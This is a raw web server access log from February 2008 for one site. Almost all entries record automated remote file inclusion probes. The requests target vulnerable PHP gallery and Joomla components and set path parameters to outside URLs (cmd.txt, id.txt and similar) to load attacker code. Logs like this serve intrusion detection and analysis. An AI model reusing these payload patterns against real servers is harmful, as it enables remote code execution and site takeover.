207.210.111.98 - - [08/Feb/2008:04:00:05 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.treeoflifeinc.org/media/roman.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.111.98 - - [08/Feb/2008:04:00:05 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.treeoflifeinc.org/media/roman.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.141.173.75 - - [08/Feb/2008:04:00:14 -0800] "GET /logs/access_080106.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://worned01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.114.5 - - [08/Feb/2008:04:00:49 -0800] "GET /logs/index.php?lang=http://www.joecrews.xpgplus.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.114.5 - - [08/Feb/2008:04:00:49 -0800] "GET /logs/index.php?lang=http://www.joecrews.xpgplus.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.114.5 - - [08/Feb/2008:04:00:49 -0800] "GET /index.php?lang=http://www.joecrews.xpgplus.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.114.5 - - [08/Feb/2008:04:00:49 -0800] "GET /index.php?lang=http://www.joecrews.xpgplus.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.130.9 - - [08/Feb/2008:04:01:02 -0800] "GET /logs/access_080108.log///////////modules/4nAlbum/public/displayCategory.php?basepath=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.9 - - [08/Feb/2008:04:01:03 -0800] "GET ///////////modules/4nAlbum/public/displayCategory.php?basepath=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.9 - - [08/Feb/2008:04:01:03 -0800] "GET /logs///////////modules/4nAlbum/public/displayCategory.php?basepath=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.50.243.66 - - [08/Feb/2008:04:02:01 -0800] "GET /logs/access_080105.log///////////modules/4nAlbum/public/displayCategory.php?basepath=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.141.194 - - [08/Feb/2008:04:02:22 -0800] "GET /index.php?option=com_directory&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
74.53.141.194 - - [08/Feb/2008:04:02:22 -0800] "GET /logs/index.php?option=com_directory&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
207.210.111.98 - - [08/Feb/2008:04:02:30 -0800] "GET /logs/access_071230.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.treeoflifeinc.org/media/roman.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.174.65.77 - - [08/Feb/2008:04:03:30 -0800] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.77 - - [08/Feb/2008:04:03:30 -0800] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.77 - - [08/Feb/2008:04:03:31 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.77 - - [08/Feb/2008:04:03:31 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.77 - - [08/Feb/2008:04:03:31 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.77 - - [08/Feb/2008:04:03:32 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.77 - - [08/Feb/2008:04:03:36 -0800] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.77 - - [08/Feb/2008:04:03:37 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.77 - - [08/Feb/2008:04:03:37 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.113.221.15 - - [08/Feb/2008:04:03:54 -0800] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.113.221.15 - - [08/Feb/2008:04:03:54 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.144.55.219 - - [08/Feb/2008:04:03:59 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.144.55.219 - - [08/Feb/2008:04:04:09 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.23.190 - - [08/Feb/2008:04:04:35 -0800] "GET /index.php?option=com_directory&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
66.249.23.190 - - [08/Feb/2008:04:04:36 -0800] "GET /logs/index.php?option=com_directory&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
83.99.156.155 - - [08/Feb/2008:04:05:05 -0800] "GET /logs/access_080106.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://worned01.iespana.es/bds/sefe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
60.48.110.18 - - [08/Feb/2008:04:05:59 -0800] "GET /modules/My_eGallery/index.php?basepath=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.77.184.236 - - [08/Feb/2008:04:06:08 -0800] "GET /logs/access_080105.log/config.php?xcart_dir=http://www.gunslingerfirearms.com/store/squirrelcart/sc_data/agreements/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.77.184.236 - - [08/Feb/2008:04:06:08 -0800] "GET /logs/config.php?xcart_dir=http://www.gunslingerfirearms.com/store/squirrelcart/sc_data/agreements/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.246.99.64 - - [08/Feb/2008:04:06:50 -0800] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.99.64 - - [08/Feb/2008:04:06:50 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.99.64 - - [08/Feb/2008:04:06:50 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.130.9 - - [08/Feb/2008:04:07:57 -0800] "GET /logs/access_080105.log///////////modules/4nAlbum/public/displayCategory.php?basepath=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.60.121.56 - - [08/Feb/2008:04:07:57 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gunslingerfirearms.com/store/squirrelcart/sc_data/agreements/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.60.121.56 - - [08/Feb/2008:04:07:57 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gunslingerfirearms.com/store/squirrelcart/sc_data/agreements/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.176.60 - - [08/Feb/2008:04:09:07 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.93 - - [08/Feb/2008:04:09:09 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.93 - - [08/Feb/2008:04:09:09 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.93 - - [08/Feb/2008:04:09:09 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.93 - - [08/Feb/2008:04:09:11 -0800] "GET /logs/access_080130.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.236 - - [08/Feb/2008:04:09:23 -0800] "GET /logs/access_071222.log/config.php?xcart_dir=http://www.gunslingerfirearms.com/store/squirrelcart/sc_data/agreements/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.90.120.18 - - [08/Feb/2008:04:11:10 -0800] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.saenterpriseworkshop.com/vnc/MIC22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.90.120.18 - - [08/Feb/2008:04:11:15 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.saenterpriseworkshop.com/vnc/MIC22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.90.120.18 - - [08/Feb/2008:04:11:15 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.saenterpriseworkshop.com/vnc/MIC22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.99.64 - - [08/Feb/2008:04:11:18 -0800] "GET /logs/access_080106.log/index.php?lang=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.99.64 - - [08/Feb/2008:04:11:18 -0800] "GET /index.php?lang=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.99.64 - - [08/Feb/2008:04:11:18 -0800] "GET /logs/index.php?lang=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
60.48.110.18 - - [08/Feb/2008:04:11:23 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.113.221.15 - - [08/Feb/2008:04:11:39 -0800] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.203.223.93 - - [08/Feb/2008:04:11:49 -0800] "GET /logs/access_080106.log/index.php?lang=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.93 - - [08/Feb/2008:04:11:50 -0800] "GET /index.php?lang=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.93 - - [08/Feb/2008:04:11:50 -0800] "GET /logs/index.php?lang=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.99.64 - - [08/Feb/2008:04:12:17 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.218.85.18 - - [08/Feb/2008:04:13:11 -0800] "GET /logs/access.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [08/Feb/2008:04:13:12 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [08/Feb/2008:04:13:13 -0800] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.99.64 - - [08/Feb/2008:04:13:21 -0800] "GET /logs/access.log/index.php?lang=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.203.223.93 - - [08/Feb/2008:04:14:26 -0800] "GET /logs/access.log/index.php?lang=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
60.48.110.18 - - [08/Feb/2008:04:15:15 -0800] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.48.110.18 - - [08/Feb/2008:04:15:17 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.48.110.18 - - [08/Feb/2008:04:15:19 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.133.191.100 - - [08/Feb/2008:04:15:25 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.fwfccucc.org/n? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.52.88.90 - - [08/Feb/2008:04:15:46 -0800] "GET /logs/access_071216.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://turnkeywebsites247.com/catimages/z? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.88.90 - - [08/Feb/2008:04:15:46 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://turnkeywebsites247.com/catimages/z? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.88.90 - - [08/Feb/2008:04:15:46 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://turnkeywebsites247.com/catimages/z? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.113.221.15 - - [08/Feb/2008:04:16:10 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.113.221.15 - - [08/Feb/2008:04:16:10 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.88.90 - - [08/Feb/2008:04:16:47 -0800] "GET /logs/access_080130.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://turnkeywebsites247.com/catimages/z? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.88.90 - - [08/Feb/2008:04:17:03 -0800] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://turnkeywebsites247.com/catimages/z? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.88.90 - - [08/Feb/2008:04:17:03 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://turnkeywebsites247.com/catimages/z? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.88.90 - - [08/Feb/2008:04:17:03 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://turnkeywebsites247.com/catimages/z? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.90.120.18 - - [08/Feb/2008:04:17:22 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.saenterpriseworkshop.com/vnc/MIC22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.88.90 - - [08/Feb/2008:04:18:38 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://turnkeywebsites247.com/catimages/z? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.88.90 - - [08/Feb/2008:04:18:38 -0800] "GET //skin/zero_vote/error.php?dir=http://turnkeywebsites247.com/catimages/z? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.88.90 - - [08/Feb/2008:04:18:38 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://turnkeywebsites247.com/catimages/z? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.50.26 - - [08/Feb/2008:04:18:51 -0800] "GET /logs/access_071230.log/index:php?pageurl=http://anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [08/Feb/2008:04:18:52 -0800] "GET /index:php?pageurl=http://anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [08/Feb/2008:04:18:52 -0800] "GET /logs/index:php?pageurl=http://anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.22.103.143 - - [08/Feb/2008:04:18:56 -0800] "GET /logs/access_080108.log/convert/mvcw.php?vwar_root=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.22.103.143 - - [08/Feb/2008:04:18:56 -0800] "GET /convert/mvcw.php?vwar_root=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.22.103.143 - - [08/Feb/2008:04:18:57 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.38.50.26 - - [08/Feb/2008:04:19:40 -0800] "GET /logs/access_071225.log/index:php?pageurl=http://anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.22.103.143 - - [08/Feb/2008:04:19:57 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.60.121.56 - - [08/Feb/2008:04:20:48 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gunslingerfirearms.com/store/squirrelcart/sc_data/agreements/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.88.90 - - [08/Feb/2008:04:20:50 -0800] "GET /logs/access_071231.log//skin/zero_vote/error.php?dir=http://turnkeywebsites247.com/catimages/z? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.60.121.56 - - [08/Feb/2008:04:20:58 -0800] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gunslingerfirearms.com/store/squirrelcart/sc_data/agreements/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
60.48.110.18 - - [08/Feb/2008:04:22:00 -0800] "GET /logs/access_080121.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.48.110.18 - - [08/Feb/2008:04:22:01 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.167.199.194 - - [08/Feb/2008:04:22:19 -0800] "GET /logs/access_080108.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.167.199.194 - - [08/Feb/2008:04:22:19 -0800] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.167.199.194 - - [08/Feb/2008:04:22:20 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.18.194.158 - - [08/Feb/2008:04:22:23 -0800] "GET /logs/access_080121.log/index.php?redir=http://worned01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.18.194.158 - - [08/Feb/2008:04:22:25 -0800] "GET /logs/index.php?redir=http://worned01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.17.59 - - [08/Feb/2008:04:22:58 -0800] "GET /logs/access_080108.log/joomla/index.php?option=com_restaurante&task=http://youngfamilies.westhuntsville.org//webcalendar//tools/.../nato?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.17.59 - - [08/Feb/2008:04:22:59 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://youngfamilies.westhuntsville.org//webcalendar//tools/.../nato?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.17.59 - - [08/Feb/2008:04:22:59 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://youngfamilies.westhuntsville.org//webcalendar//tools/.../nato?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.45 - - [08/Feb/2008:04:23:09 -0800] "GET /presto/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
194.183.77.56 - - [08/Feb/2008:04:24:04 -0800] "GET /logs/access_080104.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://217.126.22.22/.../myss.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.184.170 - - [08/Feb/2008:04:26:09 -0800] "GET /logs///////////?mosConfig_absolute_path=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 200 33699 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
207.58.184.170 - - [08/Feb/2008:04:26:09 -0800] "GET ///////////?mosConfig_absolute_path=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 200 2971 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
72.9.152.104 - - [08/Feb/2008:04:26:11 -0800] "GET /index.php?option=com_directory&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.77 - - [08/Feb/2008:04:26:14 -0800] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.77 - - [08/Feb/2008:04:26:15 -0800] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.77 - - [08/Feb/2008:04:26:15 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.77 - - [08/Feb/2008:04:26:16 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.77 - - [08/Feb/2008:04:26:17 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.77 - - [08/Feb/2008:04:26:17 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.77 - - [08/Feb/2008:04:26:17 -0800] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.77 - - [08/Feb/2008:04:26:18 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.77 - - [08/Feb/2008:04:26:18 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.28.233 - - [08/Feb/2008:04:26:19 -0800] "GET /presto/?N=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
